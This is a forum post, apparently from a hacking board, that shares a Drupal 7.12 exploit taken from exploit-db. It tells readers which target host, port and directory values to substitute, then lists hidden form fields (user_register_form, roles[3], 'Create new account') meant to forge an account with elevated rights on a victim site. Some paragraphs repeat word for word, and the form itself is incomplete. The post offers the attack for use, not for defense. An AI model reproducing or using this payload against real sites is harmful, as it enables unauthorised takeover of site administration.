Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities 04-07-2012, 10:15 PM
#1
Hello!
I've came across this on exploit-db. All credits go to: Ivano Binetti (http://ivanobinetti.com)
Link to exploit: http://www.exploit-db.com/exploits/18564/
Its pretty much explained there.
For better understanding I've split the link here:
The rest should be clear.
IMPORTANT! DON'T CHANGE THESE:
I've came across this on exploit-db. All credits go to: Ivano Binetti (http://ivanobinetti.com)
Link to exploit: http://www.exploit-db.com/exploits/18564/
Its pretty much explained there.
For better understanding I've split the link here:
Code:
<drupal_ip> = This doesn't have to be necessarily the IP. It can be domain.
:80 = not really needed as port 80 is default. You may want to change it if different port is used.
/drupal/ = Directory where drupal is installed. You may want to change or delete it
admin/ = Directory where admin CP is installed. Many websites will have it as default.The rest should be clear.
IMPORTANT! DON'T CHANGE THESE:
Code:
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="roles[3]" value="3"/>
<input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
<input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
<input type="hidden" name="form_id" value="user_register_form"/>
<input type="hidden" name="op" value="Create new account"/>Staff will never ever ask you for your personal information.
We know everything about you anyway.
We know everything about you anyway.




![[+]](https://sinister.li/images/modern/collapse_collapsed.png)
moke: